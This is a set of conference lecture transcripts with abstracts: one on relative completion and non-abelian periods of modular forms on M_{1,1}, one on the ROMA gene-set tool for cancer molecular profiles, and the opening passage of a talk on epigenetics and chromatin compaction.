cocycle; I'll talk about that next time, and to get it canonical you need a tangential base point. So there are a lot of very basic things here that are sort of not in the literature, but that can be made canonical and very explicit, and we will need them. If you look at the period of the Eisenstein series you are going to get a zeta value, which is the period of a mixed motive; that is very interesting. But if you look at the periods of the cusp forms we are going to get exactly these four numbers, the periods and the quasi-periods. For the Eisenstein part it is one by one: for the Eisenstein series we get two powers of 2 pi i and an odd zeta value, and then 2 pi i, 2 pi i, 2 pi i.
Sorry, how do you mean? No, there is only one integral, because the Eisenstein part is either plus- or minus-invariant, I can't remember which; there is only one eigenspace, it is one by one. So this splits into a cuspidal part, and then there is the Eisenstein part H^1_Eis(Gamma, V_n), which I think is anti-invariant or something; that one is one-dimensional, the cuspidal one is two-dimensional. And there are a lot of things written in the literature about these Eisenstein classes that are very confusing. So maybe next time I will say some more about these periods and then explain how you get the non-abelian periods afterwards. Yeah, exactly: you are taking this column and the complex conjugate of this column here. You are getting two copies of the same thing and you are just taking the complex conjugate. I mean, we do write this all the time, but it is absolutely not the statement that we want. Okay, so I have half an hour: tangential base points. I may have to abbreviate a little bit. The idea is the following. We take C-bar, a smooth complex curve, and we take a point p in C-bar, and what we are really interested in is the complement: we have a curve from which we remove a point. The whole idea is that you want to take a base point at the point p, which you are not allowed to do, because you removed it. So how do you define a base point at a point that is not in the space? Well, you don't: you take a tangential base point. A tangential base point at p is simply a non-zero vector (it is convenient to write it with an arrow to emphasize that it is a vector) in the tangent space of the compact, filled-in curve C-bar. So we think of the point p that we have removed, with some tangent vector sticking out of it. And the point is that this perfectly well plays the role of a base point in every setting that we care to think about, and it will define fibre functors on various categories of local systems or algebraic vector bundles and so on. Since I am slightly short of time, I will just explain how you can define a notion of fundamental group, and then explain the tangential base point that we are using; the rest of the discussion I will postpone until I look at periods. So what is a path? A path from this tangent vector to another point y in the curve is the data of a map into the curve which is continuous, and also differentiable at zero, such that the entire interval except the initial point is actually contained in the open complement, let's call it C, which is C-bar minus p; the initial point is p, we specify that the initial velocity of the path should be given by the tangent vector v, and the end point is y. You think of this in the obvious way: you have the point p here with a vector sticking out, and the point y over here, and a path from this tangent vector to y is a path that goes from p to y such that its initial velocity is given by the vector v. So that is defined, and out of this you can define a notion of homotopy between paths and you can define the fundamental group. There is nothing to stop us in this definition from even taking y to be a tangential base point, and the definition is the same, except that you end with a minus: the final velocity is minus the tangent vector at y.
So it is the obvious definition. And there is a notion of homotopy of such paths: a homotopy is a continuous deformation which preserves the condition on the derivative at the initial and, possibly, end points. And so then there is a notion of pi_1, the topological pi_1 of C: this is the space of homotopy classes of paths from the tangential base point to y. And likewise there is a notion of the fundamental group of loops based at v_p: a loop based at this tangent vector is what I said, a loop that does something and then comes back with final velocity minus v. Okay, so you can do everything that you normally do with base points with tangential base points. Let me just explain which tangential base point will play a role for us. We have the disk: the open punctured disk of radius one is the set of points q in C such that 0 < |q| < 1. And then there is an orbifold isomorphism: the upper half plane modulo the stabilizer of the cusp at infinity is isomorphic, via the map q = e^{2 pi i tau}, to the punctured disk stack-quotiented by Z/2Z. This is not the same thing as the actual quotient of D* by Z/2Z. And from this, since this group is a subgroup of SL_2(Z), this orbifold has a map to M_{1,1}, and therefore we get a map from the actual disk to the orbifold quotient and then onto M_{1,1}. So what is our tangent vector? It is d/dq, which is going to be our base point: the unit tangent vector at zero on the punctured disk. So we have our picture of the punctured disk with zero removed, and its tangent vector sticking out of zero like this. Of course we are working with a stack here; to work with tangential base points it is the same as usual, we can pass to some covering and view the tangential base point on the covering. With that said, another way to think about this, or equivalently: on the upper half plane, what does this tangent vector d/dq correspond to? If I draw a picture of the upper half plane, with the real axis and the imaginary axis here, and put the cusp infinity up here, then this tangent vector corresponds to a tangent vector sticking down like this, and so sometimes I call it the 1 at infinity. It is a unit tangent vector, in the coordinate q, at infinity, and some people write it d/dq. So this also defines fibre functors on various categories of geometric objects on M_{1,1}. So let me write V_n for the same V_n as before, the Betti local system we defined earlier: we can take its fibre at d/dq, at this tangent vector, and it is the vector space I wrote down earlier; and likewise with de Rham, which I am going to call V_n^dR. In the Betti case I do not put a superscript, I just drop it.
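In symbols, the tangential base point and the fibre functors it defines, writing omega_{d/dq} for "take the fibre at d/dq" (the same fibre functor used below):

\[
q = e^{2\pi i \tau}:\ \mathbb{H}\,/\,\mathrm{Stab}_{\Gamma}(\infty)\ \xrightarrow{\ \sim\ }\ \mathbb{D}^{*}/(\mathbb{Z}/2\mathbb{Z})\ \ (\text{as a stack}), \qquad
\frac{\partial}{\partial q} = \text{unit tangent vector at } q=0,
\]
\[
\omega_{\partial/\partial q}\bigl(\mathcal{V}_n^{B}\bigr) = V_n, \qquad \omega_{\partial/\partial q}\bigl(\mathcal{V}_n^{\mathrm{dR}}\bigr) = V_n^{\mathrm{dR}}.
\]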
Right, so at long last we can now talk about relative completion on the space M_{1,1}. Of course a lot of what I say is completely general, but we are really only interested in this particular space. The category of local systems of finite-dimensional Q-vector spaces on M_{1,1}^an is equivalent, via the functor at d/dq (we take the fibre at d/dq; I did not completely explain how to do that, but I will do it next time), to the category of finite-dimensional Q-vector spaces with an action of Gamma; it is an equivalence of categories. And so what we get then is a map: if we apply this to V_1^B, which is just the local system of the cohomology of the universal elliptic curve, the fundamental building block, then this gives us a vector space with a Gamma-action. In other words we get a map from pi_1 of M_{1,1}, the fundamental group with respect to this tangential base point, acting on the fibre of V at d/dq. So this is a map rho, and what we get is a map rho from Gamma, which is SL_2(Z), into SL_2(Q): an explicit representation of SL_2(Z) with respect to this basis x and y. Okay, so if you recall from last time, relative completion involved a homomorphism from a group into the rational points of an algebraic group, and that is what this is. (Oh, I have got a board here, sorry.) So this is the initial data for taking relative completion. Now, to define the Betti relative completion, we define a category, let me call it just curly C, whose objects are more general local systems on M_{1,1}^an equipped with a filtration, a finite exhaustive increasing filtration by sub-local systems, 0 = L_0 contained in L_1, up to the whole space, such that the successive quotients are the ones that we know and love: each successive quotient is just a direct sum of the canonical ones that we defined at the beginning, the m-th symmetric powers of, essentially, H^1 of the elliptic curve (I called it H, I think). Right, so these local systems are iterated extensions of these building blocks; the semisimplification is a direct sum of these symmetric powers, but we are going to look at successive non-trivial extensions between these local systems. So this is a Tannakian category, and it has a fibre functor omega_{d/dq}, which is: take the fibre of such a local system at our base point, and that gives an exact tensor functor to vector spaces over Q. And then from this we define G, the Betti relative completion. The notation is going to be G_{1,1}, because the 1,1 means that we are looking at M_{1,1}, and it is defined to be the automorphisms of this fibre functor. So this is the Betti relative completion, and it is an affine group scheme over Q; very concretely, that means that its affine ring is a commutative Hopf algebra over Q. And by the Tannaka theorem, this category C is exactly equivalent to the category of representations of this group. In fact it is the same group as the one I defined last time. We can see that because we have a functor, in fact this equivalence of categories, from local systems to representations: there is a functor from this category C to Gamma-representations, which is take the fibre at d/dq, but, by contrast with the previous functor, we do not forget the Gamma-action. So before, we had a fibre functor that just gave a vector space; that factors through this functor which, to an object of the category C, associates the corresponding representation of the fundamental group, that is, the action on the fibre at the base point at infinity. And this induces (in fact it is completely obvious from the definition, if you translate everything back into representations, that you get exactly the definition I gave last time), and hence we get a map from G_{Gamma, rho}, which was the relative completion of SL_2(Z) relative to the representation rho that I defined last time.
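To record the definition just given in symbols, writing Aut^{tensor} for the tensor automorphisms of the fibre functor, which is what "automorphisms" means here for a Tannakian category:

\[
\rho:\ \Gamma = \pi_1\bigl(\mathcal{M}_{1,1}^{\mathrm{an}},\ \partial/\partial q\bigr) \longrightarrow \mathrm{SL}_2(\mathbb{Q}), \qquad
\mathcal{G}^{B}_{1,1} \;:=\; \mathrm{Aut}^{\otimes}\bigl(\omega_{\partial/\partial q}:\ \mathcal{C} \to \mathrm{Vec}_{\mathbb{Q}}\bigr),
\]

an affine group scheme over Q whose category of representations recovers the category C.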
And it is going to be canonically isomorphic to this Betti relative completion. So this is just another way of saying that the Betti relative completion is simply the group-theoretic relative completion, exactly the same thing; but what we have gained is that this geometric interpretation gives us more information. And therefore, as I explained last time, Gamma acts on the fibre functor back there and therefore gives automorphisms, so we have a canonical map from SL_2(Z) into the rational points of this group, and it is Zariski-dense. So we have got some huge affine group scheme, some huge projective limit of algebraic groups, and sitting densely inside it is the group SL_2(Z) itself. This is the main tool we have for understanding the Betti side of things: it is some algebraic hull of SL_2(Z). So now for the de Rham relative completion, in ten minutes. Okay. We now define, in the analogous way, a category A of algebraic vector bundles on M_{1,1}. I remind you that we can think of these as graded, or G_m-equivariant, algebraic vector bundles on the scheme M_{1,vec 1}, with integrable connection and regular singularities at infinity, that is, at the cusp, equipped with a filtration. So it is the same definition really: 0 = V_0 contained in V_1, up to V_n = V, a filtration by algebraic sub-bundles equipped with an integrable connection, et cetera, et cetera (I don't want to repeat everything), such that the successive quotients are isomorphic to a direct sum of the m-th symmetric powers of the Gauss-Manin connection on the cohomology of the universal elliptic curve. Again, these are the basic building blocks, and we are looking at connections which are iterated extensions of such things, all possible iterated extensions. This has a fibre functor given by the tangential base point at the cusp, and we define the de Rham relative completion to be the tensor automorphisms of this category with respect to the fibre functor, the fibre at d/dq. So this is called the de Rham relative completion, and again it is an affine group scheme over Q. So actually, we'll keep that. As I mentioned last time, these groups have unipotent radicals which are pro-unipotent algebraic groups; we write the unipotent radicals as U, and these SL_2's are not the same: there is an isomorphism between them, but it is non-trivial, so it is convenient to denote these copies of SL_2 with different superscripts, SL_2^B and SL_2^dR. It saves a lot of confusion. So now our proposition is that there is a canonical comparison isomorphism between these two group schemes: when you extend scalars to the complex numbers, these groups become canonically isomorphic. This comparison involves integration, so it will produce lots of periods, and these periods are very interesting: they will be what I like to call multiple modular values. As for the proof, I am out of time, so I will just say it is kind of clear: it is just the Riemann-Hilbert correspondence, Deligne's version of the Riemann-Hilbert correspondence between local systems and algebraic vector bundles, and you just need to check something on the Ext groups. You use the fact that the Ext^1 in the category C of the trivial object by V_n^B is H^1 of M_{1,1}^an with coefficients in V_n^B, and in the de Rham category A the extensions of the trivial object by V_n^dR are, again, the de Rham H^1; and clearly the Riemann-Hilbert correspondence induces the comparison isomorphism here, which is an isomorphism.
That was the theorem that was written down earlier, and you can check that this is actually enough, because the underlying Lie algebra of this group is free: if you have a map between unipotent groups whose Lie algebras are free Lie algebras and which is an isomorphism on generators, then it is an isomorphism. That is very easy to show. So that was a very heavy-handed proof, but still. So what is the structure of these groups? Well, I mentioned this briefly at the end of the last lecture: we can compute the cohomology of the unipotent radicals. The cohomology of the unipotent radical on the Betti side is the direct sum over n of H^1(Gamma, V_n) tensor the dual of V_n; I remind you that V_n is this vector space of dimension n+1, which should be thought of as the fibre at d/dq of the local system. Similarly, on the de Rham side it is the algebraic de Rham cohomology tensored with the dual of V_n^dR, where V_n^dR is the fibre at d/dq. Okay, and there is no H^2, no higher cohomology. So, as we have seen, by Eichler-Shimura, or rather the comparison isomorphism, these things are built out of group cocycles on one side, and out of modular forms, essentially, on the other. So what this relative completion is, is SL_2, some sort of trivial piece, and some huge pro-algebraic, pro-unipotent part that is built out of modular forms; and therefore we should think of this comparison isomorphism as a non-abelian generalization of the Eichler-Shimura isomorphism. Another way to say it is that the abelianization gives back exactly what we had: if you restrict to the unipotent radicals and pass to the abelianization, which is very small, then you get back exactly the comparison isomorphism I wrote down earlier. So in the very last minute, let me write down the Lie algebra. u_{1,1}^dR is something very concrete: it is the Lie algebra of this pro-unipotent group, and a pro-unipotent group is always isomorphic, as a vector space, to its Lie algebra. From this description we know that its homology, in other words its space of generators, is isomorphic to the product over n of the dual of the algebraic de Rham cohomology tensor V_n^dR. Therefore, because the higher cohomology vanishes, this is a free Lie algebra: it is the completion of a free Lie algebra on generators given by classes here. Let me just write them down and stop, and next time I will explain how you can put a mixed Hodge structure on this. So the Lie algebra has the following generators, which we can denote by symbols. You are going to get an Eisenstein part of the algebraic de Rham cohomology, and it is going to come with a copy of the vector space V_{2n}; this is an SL_2-representation (SL_2 being the reductive quotient), indexed by an Eisenstein series. So e_{2n+2} is a symbol which represents the Eisenstein series G_{2n+2} of weight 2n+2, so the weight is going to be even. So we get generators from Eisenstein series, but we also get generators from cusp forms, and because the cusp forms occur with multiplicity 2, we can choose, like the basis Delta and Delta' I had earlier, a basis e_f' and e_f''. So for every cusp form we get two generators (I do not want to talk about Hecke eigenforms, because I am working over Q for now): for every cusp form in a choice of Q-basis of the cusp forms of weight 2n+2, we get two generators. So that's it.
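Summarising the structure just described; the placement of the duals and the indexing follow the dictation, and the convention V_{2n} versus its dual is not being pinned down here:

\[
H^1\bigl(\mathfrak{u}^{B}_{1,1}\bigr) \;\cong\; \bigoplus_{n} H^1(\Gamma, V_n)\otimes V_n^{\vee}, \qquad
H^1\bigl(\mathfrak{u}^{\mathrm{dR}}_{1,1}\bigr) \;\cong\; \bigoplus_{n} H^1_{\mathrm{dR}}\bigl(\mathcal{M}_{1,1},\mathcal{V}_n^{\mathrm{dR}}\bigr)\otimes (V_n^{\mathrm{dR}})^{\vee}, \qquad H^2 = 0,
\]

so that u_{1,1}^dR is the completion of a free Lie algebra with generators

\[
\mathsf{e}_{2n+2}\otimes V_{2n}\ \ (\text{one for each Eisenstein series } G_{2n+2}), \qquad
\mathsf{e}'_{f}\otimes V_{2n},\ \ \mathsf{e}''_{f}\otimes V_{2n}\ \ (\text{two for each cusp form } f \text{ of weight } 2n+2).
\]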
So in this Lie algebra you have the simple generators corresponding exactly to the classical theory of modular forms and then the next interesting thing that's going to happen is that you're going to get Lie brackets of two such guys and they're going to give periods and they're going to give objects and that's what I mean by the non-Abelian theory of modular forms. I'll stop there. Thank you.
|
In the `Esquisse d'un programme', Grothendieck proposed studying the action of the absolute Galois group upon the system of profinite fundamental groups of moduli spaces of curves of genus g with n marked points. Around 1990, Ihara, Drinfeld and Deligne independently initiated the study of the unipotent completion of the fundamental group of the projective line with 3 points. It is now known to be motivic by Deligne-Goncharov and generates the category of mixed Tate motives over the integers. It is closely related to many classical objects such as polylogarithms and multiple zeta values, and has a wide range of applications from number theory to physics. In the first, geometric, half of this lecture series I will explain how to extend this theory to genus one (which generates the theory in all higher genera). The unipotent fundamental groupoid must be replaced with a notion of relative completion, studied by Hain, which defines an extremely rich system of mixed Hodge structures built out of modular forms. It is closely related to Manin's iterated Eichler integrals, the universal mixed elliptic motives of Hain and Matsumoto, and the elliptic polylogarithms of Beilinson and Levin. The question that I wish to confront is whether relative completion stands a chance of generating all mixed modular motives or not. This is equivalent to studying the action of a `motivic' Galois group upon it, and the question of geometrically constructing all generalised Rankin-Selberg extensions. In the second, elementary, half of these lectures, which will be mostly independent from the first, I will explain how the relative completion has a realisation in a new class of non-holomorphic modular forms which correspond in a certain sense to mixed motives. These functions are elementary power series in $q$ and $\overline{q}$ and $\log |q|$ whose coefficients are periods. They are closely related to the theory of modular graph functions in string theory and also intersect with the theory of mock modular forms.
|
10.5446/50879 (DOI)
|
So thank you for the opportunity to present this work today. I work in the group of cancer systems biology at the Curie Institute, and my talk is related to the previous one, because we are also developing methods to analyze molecular profiles, mainly for cancer patients. We are struggling with these molecular profiles, trying to understand how different patients respond in very different ways to the same treatment, or how they differ even if they are diagnosed with the same disease. So I will discuss our concept of analyzing these molecular profiles in terms of gene sets, because now we are not only measuring five or six markers: we are measuring thousands of genes, and a transcriptomic or proteomic experiment contains the measurement of five thousand or ten thousand genes. So we really need to simplify all this data to understand whether it can tell us something about the disease and the patient. This concept of a gene set is becoming more and more popular in the analysis of molecular profiles because, comparing different patients with the same disease, we are understanding more and more that the same pathway can be affected in different individuals in different ways: the same signaling pathway can be affected in one patient maybe at the membrane level, and in another patient at another molecule, more downstream in the signaling. So the same signaling is affected, but these samples are more comparable at the pathway level than at the single-gene level. This is why gene-set approaches are becoming more and more used to try to dissect this type of data. Here was an example: we have a cohort of colorectal cancer patients, and we know from previous models and from previous analyses in mouse models that Notch signaling is affected in a different way between invasive and non-invasive tumors, so we want to verify what is happening in the human samples. Thanks to very large projects like The Cancer Genome Atlas, an international effort, we have access to public data on very large cohorts of patients. So we go to the colorectal cancer data, a very large cohort of hundreds of samples, and we divide our cohort, according to clinical data, into two groups, metastatic and non-metastatic, simply on the appearance of metastases, and we check the expression of genes involved in Notch signaling in these two groups. And we observe, for many genes that are known to be involved in Notch signaling, that there is no big difference at the single-gene level in the cancer cohort. Are these healthy tissues, or are they biopsies? They are biopsies; yes, exactly, these are the cancer samples. So again, at the single-gene level of Notch signaling we were not able to detect any difference. So we tried to develop a method that can catch information at the gene-set level, to understand how active or inactive Notch signaling is in each sample. The idea of a gene set means that we need to define groups of genes that are considered to have a coordinated expression: these can be, for instance, targets of common transcription factors, some downstream targets, or genes that are involved in the same signaling process. There are many different ways we can define these sets.
As soon as we define these sets, we can quantify the activity of the whole set. Again, there is another big assumption in our method, which is based on a one-factor linear model. Of course this can be expanded and developed in a more complicated way, but the first approximation in our model is that the genes in the same set are under the influence of one main factor, which can be an oncogenic event or a drug perturbation. We need to make this assumption, and if we can, then we can approximate and rewrite the matrix of gene expression for all the genes in our set as the product of two vectors: the first vector is the metagene, the first principal component of the expression of the set of genes, and the second vector gives us the level of this metagene in the different samples. So what happens is simply that the big matrix of many genes is now approximated by these two vectors: the vector of coefficients that gives us the metagene, and the weights, the level of this metagene in our samples. This model allows us to identify what is an overdispersed gene set, a concept already presented in some recent literature, where we try to define which gene sets, in our conditions, show a high variance, an excess of variance compared to the background. Meaning that if we test many different gene sets on our data, some show high variability compared to background random gene sets, and we consider that these sets are particularly active or inactive in our conditions. Of course we have to define this background expectation, and once we have it, we can identify these active or inactive sets. All this is implemented computationally, which allows us to do it automatically for many pathways, and if we do not have any a priori knowledge we can test a complete database of pathways that are now available. So if we have the expression data, this big matrix with 10,000 genes measured in many conditions, and we have a definition of sets of pathways, we can run this analysis and at the end obtain these coefficients of overdispersion, meaning, for each gene set, how overdispersed it is in our data, according to the level of its metagene in our samples. There are some features that we had to introduce, because statistically we need to take some facts into account. For instance, for a very small gene set it is quite probable to obtain such a variance by chance, so this L1, the variance explained by the first component, really depends on the size of the set, and we should avoid taking very small sets into consideration. We do this by assessing the null distribution: we take random sets of genes of the same size and test the variance of these random sets, and typically, for small sets, the random sets show the same variance as the set we are testing. Another thing we take into account is that we can have different patterns of overdispersion: some genes can contribute positively or negatively to the variance of the set, but in some cases all genes contribute in the same direction. Imagine a transcription factor that, we don't know why, acts here only as an activator, and all the targets are over-expressed in this set. In our case we are able to detect this type of pattern as well.
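As a rough illustration of the rank-one metagene idea and the random-set background just described, here is a minimal sketch in Python. It is not the group's actual ROMA implementation: the function name, the use of a plain SVD, and the permutation test are my own simplifications, and the gene and sample inputs are placeholders.

import numpy as np

def gene_set_score(expr, gene_names, gene_set, n_random=1000, seed=0):
    # expr: numpy array of shape (genes, samples); gene_names: list of gene identifiers
    rng = np.random.default_rng(seed)
    idx = [gene_names.index(g) for g in gene_set if g in gene_names]
    X = expr[idx, :] - expr[idx, :].mean(axis=1, keepdims=True)  # centred sub-matrix for the set
    U, s, Vt = np.linalg.svd(X, full_matrices=False)
    l1 = s[0] ** 2 / np.sum(s ** 2)          # fraction of variance carried by the first component
    metagene = U[:, 0]                       # gene weights (the "metagene")
    sample_scores = s[0] * Vt[0, :]          # level of the metagene in each sample
    # null distribution: random gene sets of the same size drawn from the whole matrix
    null = np.empty(n_random)
    for i in range(n_random):
        ridx = rng.choice(expr.shape[0], size=len(idx), replace=False)
        R = expr[ridx, :] - expr[ridx, :].mean(axis=1, keepdims=True)
        rs = np.linalg.svd(R, compute_uv=False)
        null[i] = rs[0] ** 2 / np.sum(rs ** 2)
    p_value = (np.sum(null >= l1) + 1) / (n_random + 1)
    return l1, p_value, metagene, sample_scores

A gene set whose L1 is large compared to this null distribution (small p-value) is what is called overdispersed in the sense used above, and the per-sample scores play the role of the pathway activity shown in the figures.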
We can also use prior biological knowledge: if we already know that some genes should be active or inactive, we can introduce this by fixing some weights in the measurement, so that our a priori knowledge of the pathway is taken into account. One last point is that sometimes the first principal component is dominated by outliers, a particular gene in the set that behaves very differently from the others. In some cases such a gene is a very important marker of the pathway, so it can be interesting, but in many cases it is just noise in the measurements, and we should avoid results that rely too heavily on this type of gene. So we did some applications, and I will show you at least two if I have time. The first one is Notch signaling in colorectal cancer. As I said, single-gene expression was not particularly informative, but now we measure Notch and we also include in the analysis some other pathways that were informative for us, Wnt and p53. These are the results of our gene set quantification: each point is a sample, and on this axis is the score given by our ROMA tool for Notch signaling in that sample. You can see that among the aggressive tumors, the red ones, there is at least one group in which Notch does not seem to be really active, while in the non-aggressive tumors the situation is more spread out. For p53 the result was really clear: p53 targets are lost in these patients compared to the other group. Wnt was also a significant result, because it seems to be quite active in the invasive tumors rather than in the non-invasive ones. So this was one example of measuring these data in terms of gene sets. Another application we are doing more and more is to analyze transcriptomic data by checking their consistency with a mathematical model of metastasis that was developed in our group. This diagram is a typical Boolean model of invasiveness. What does that mean? We have nodes connected by edges; each node can be active or inactive, and we model the process in terms of logical rules that, starting from some initial conditions, evolve towards different phenotypes. This is not clinical information, it is biological information, meaning that we know from the literature, for instance, that AKT1 or AKT2 are involved in the process of invasiveness. So we put all these components together, we connect them according to their inhibitory or activating influences, and then we give logical rules to evolve from initial conditions towards phenotypes, towards observables. This is the process of logical modeling; this part was done by my colleagues, so I can only try to explain how it works.
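As a toy illustration of the logical modeling idea mentioned above (nodes with activating and inhibiting influences, updated by Boolean rules from an initial condition until a stable phenotype is reached), here is a small sketch. The network, the rules and the node names are invented for illustration only; they are not the actual metastasis model developed in the group.

# Toy Boolean network, synchronous update (illustration only; not the real model).
def step(state, rules):
    """Apply every node's logical rule once to the current state."""
    return {node: rule(state) for node, rule in rules.items()}

def run_to_attractor(state, rules, max_steps=50):
    """Iterate until the state stops changing (a fixed-point phenotype)."""
    previous = dict(state)
    for _ in range(max_steps):
        state = step(state, rules)
        if state == previous:
            return state          # fixed point reached
        previous = dict(state)
    return state                  # may be a cycle; return the last state

# Hypothetical rules: an input activates an AKT-like node, which inhibits an
# apoptosis node and switches on an "Invasion" phenotype node.
rules = {
    "Input":     lambda s: s["Input"],                     # external condition, kept fixed
    "AKT":       lambda s: s["Input"],
    "Apoptosis": lambda s: not s["AKT"],
    "Invasion":  lambda s: s["AKT"] and not s["Apoptosis"],
}

init = {"Input": True, "AKT": False, "Apoptosis": False, "Invasion": False}
print(run_to_attractor(init, rules))
# With Input=True the network settles into AKT on, Apoptosis off, Invasion on.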
What we have done is the following: we have these model components, and we would like to see whether the molecular profiles measured in our data fit with them, whether what is expected to be active is really expressed in our data and whether what is expected to be inactive is down. If we do this gene by gene, again we do not see a big difference. So we connect to each node in the model a set of genes instead of a single one: for TGF-beta, for instance, we measure with ROMA the level of the TGF-beta targets, and the same for the other components of the network. This seems to give a more consistent result, meaning that some nodes that are expected to be inactive in the non-metastatic group become active in the metastatic one, and so on, and again this was not possible to observe at the individual gene level. I have five more minutes, so let us skip the third example, but all these tools are available and can be of interest for other types of applications. This is the working group collaborating on this project, many of them in the cancer systems biology group, and some colleagues who have now moved to other cancer research groups. Thank you.
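As a small worked example of the node-by-node consistency check described in the talk, here is a sketch that compares per-sample module scores (such as ROMA scores for the gene sets attached to each model node) between two clinical groups against the activity expected from the model. Everything here, including the node names and expected signs, is hypothetical and only illustrates the bookkeeping; it is not the actual analysis pipeline.

# Sketch: does each model node's gene-set score move in the expected direction
# between two groups of samples? (Illustrative only; names are hypothetical.)
import pandas as pd

def check_consistency(scores: pd.DataFrame, groups: pd.Series, expected: dict):
    """
    scores   : samples x modules DataFrame of gene-set activity scores.
    groups   : per-sample label, e.g. 'metastatic' / 'non-metastatic'.
    expected : module -> +1 if the model expects it higher in 'metastatic',
               -1 if it is expected to be lower.
    """
    rows = []
    for module, sign in expected.items():
        diff = (scores.loc[groups == "metastatic", module].mean()
                - scores.loc[groups == "non-metastatic", module].mean())
        rows.append({"module": module,
                     "mean_difference": diff,
                     "expected_sign": sign,
                     "consistent": (diff > 0) == (sign > 0)})
    return pd.DataFrame(rows)

# Hypothetical usage:
# expected = {"TGFbeta_targets": +1, "Apoptosis_targets": -1}
# report = check_consistency(module_scores, sample_groups, expected)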
Then there were questions. I am not sure why you do this, because it matters for the interpretation of the data: in practice you find, for instance, that the Wnt gene set changes in a significant way, and what does that mean? It could mean that Wnt is involved in the cancer, but it might be that the Wnt gene set is part of a larger gene set and is essentially driven by the other components of that larger set, so it might be only a passenger of a larger change, which is what really counts in the cancer. In short, you cannot draw conclusions about the relevance of the changes in this gene set simply from these data, without the context. Yes, the assumption, as I said, is the uni-factor model, and as soon as you apply this method to a cancer dataset you assume that the main driver of the variance is an oncogenic event, that this is what really gives the data their variance. Of course, if the main factor driving the variance of your data is something else, then your conclusions about the cancer process are questionable. What about the predictive level of your data, how much you can actually predict from molecular data about the development of the cancer or the efficiency of a treatment? In the end that is the only thing one wants. Well, a first big step is that we are able to discriminate between different risk groups among our patients. The big aim is to be able to predict which tumors will be more aggressive than others; in some projects we are now able to clearly identify different groups of patients that were not identified before. It is not complete, because when you then look inside at some markers you see that the signaling is indeed different between groups that were not distinguished before, so you bring to light components of the process that were not identified before. Could you expand on why you focus on expression levels, as opposed to regulation of the pathway, or correlations? The main point is that previously this type of data was mainly at the transcriptional level; the same methods are now being applied to proteomics and phosphoproteomics data. The transcriptomic level was simply the first one where we were able to measure thousands of genes, to have these genome-wide experiments, but for cancer patients it is now becoming a reality to have the proteomic level as well, so we are more and more applying the approach to other molecular levels. My question is that there are only marginal differences at the expression level, but you have actually tested regulation already, for instance in phosphoproteomics data. Yes: in phosphoproteomics data we analyze sets of substrates for a given kinase, and we are able to identify kinases that are active or inactive in some samples, so we can analyze those data and interpret them in terms of active or inactive kinases or phosphatases. Those are stronger predictions. Again, the fact is that we can clearly identify different groups that behave differently in the phosphoproteomic analysis. How well we are predicting, we cannot yet say: to know how good a predictor is, we would need a cohort of patients with a certain follow-up, so we are not yet able to build predictive models, but we are at least able to identify groups of different patients. I just want to say something in defense of ROMA and the other tools: I am not a bioinformatics person, but these are programs that they develop for the use of our community, they are trying to talk to us, and they will be used; always go to ROMA. Yes, and there will be other ways you can use ROMA, that is what you were going to say, right. And I wanted to add that the goal here is not so much to understand the biological processes but to do some diagnosis or prediction; that is why she is trying to get this clear separation between the groups, so that it will be predictive of metastasis. Okay, thank you very much.
|
In many analyses of high-throughput data in systems biology, there is a need to quantify the activity of a set of genes in individual samples. In cancer, the same pathway can be affected by defects in different individual genes in different patients, and applying gene set approaches in the analysis of genomic data can help to capture biological information that is otherwise undetectable when focusing on individual genes. We present here the ROMA (Representation and quantification Of Module Activities) software, designed for fast and robust computation of the activity of gene sets (or modules) with coordinated expression. ROMA activity quantification is based on the simplest uni-factor linear model of gene regulation, which approximates the expression data of the gene set by its first principal component. The proposed algorithm implements novel functionalities: it identifies which genes contribute most to the activity of the module; it provides several alternative methods for principal component computation, including weighted and centered versions of principal component analysis; it distinguishes overdispersed modules (based on the variance explained by the first principal component) from coordinated modules (based on the significance of the spectral gap); and finally, it computes the statistical significance of the estimated module overdispersion. ROMA can be applied in many contexts, from estimating differential activities of transcription factors to finding overdispersed pathways in single-cell transcriptomics data. We present here the principles of ROMA and provide a practical example of its use: we applied it to compare distinct subtypes of medulloblastoma in terms of activated/inactivated signalling pathways and transcriptional programs.
|
10.5446/50882 (DOI)
|
So I've changed the title a little bit, actually: I've added non-coding RNAs to the story. We'll start with a general view of what epigenetics is, for those of you who don't know; mathematicians, I guess, are not very familiar with the concept. So let's start with genetics. You of course know about Mendelian transmission and genetics; you heard about it this morning. The laws of genetics allow the same phenotype with different genotypes, for example when a trait shows recessive inheritance. But genetics, taken by itself, does not predict different phenotypes with the same genotype. However, it has been known for a very long time that there are many cases of identical genotypes and different phenotypes, which tells us that genetics cannot explain everything. I'll just give you a few examples. The queen bee and the workers are generated from identical larvae, but they have very different phenotypes, as you can see here. Another example, which is closer to us, is the cells of a single organism. All the cells of a complex organism come from a single cell; they have an identical genotype, as far as we can tell, yet they become quite different: in the embryo you have completely different cells, brain, muscle, gut. All these cells have the same genotype, but they have different phenotypes. So the question, which was open for a long time but is now solved, is how these cells can have the same genotype but completely different phenotypes. The answer comes from epigenetics. The modern definition of epigenetics is the study of stable and reversible changes in gene expression that do not involve modification of the genetic information. How can this happen at the molecular level? You know that the genetic information is borne by DNA, located in the cell nucleus, in blue in this picture. But DNA is not naked. In a human cell nucleus, which is about 10 micrometers in diameter, there are about 2 meters of DNA. Such a very small nucleus cannot accommodate two meters of DNA without compaction, and indeed DNA is compacted in the cell. I apologize for the resolution, which comes from the change of computer, I guess. So you have the naked form of the DNA, and then several degrees of compaction, up to the most compacted form, which is the mitotic chromosome. This compaction is due to proteins called histones. There are several of them; we are not going to go into the details here, but you have two turns of DNA wrapped around a core of histone proteins, with a regular arrangement; these are called nucleosomes. This chain of nucleosomes can then be compacted, and the compacted chain is compacted again, so you have different levels of compaction. Now, the problem is that in compacted chromatin the DNA is not accessible to the protein machineries of the cell. If you want to express a gene, the DNA must be accessible to the RNA transcription machinery, the RNA-synthesizing machinery, so compacted chromatin corresponds to inactive genes, and open, decompacted chromatin corresponds to potentially active genes. Indeed, if you look at the cell nucleus, you see different degrees of compaction that you can even distinguish by electron microscopy.
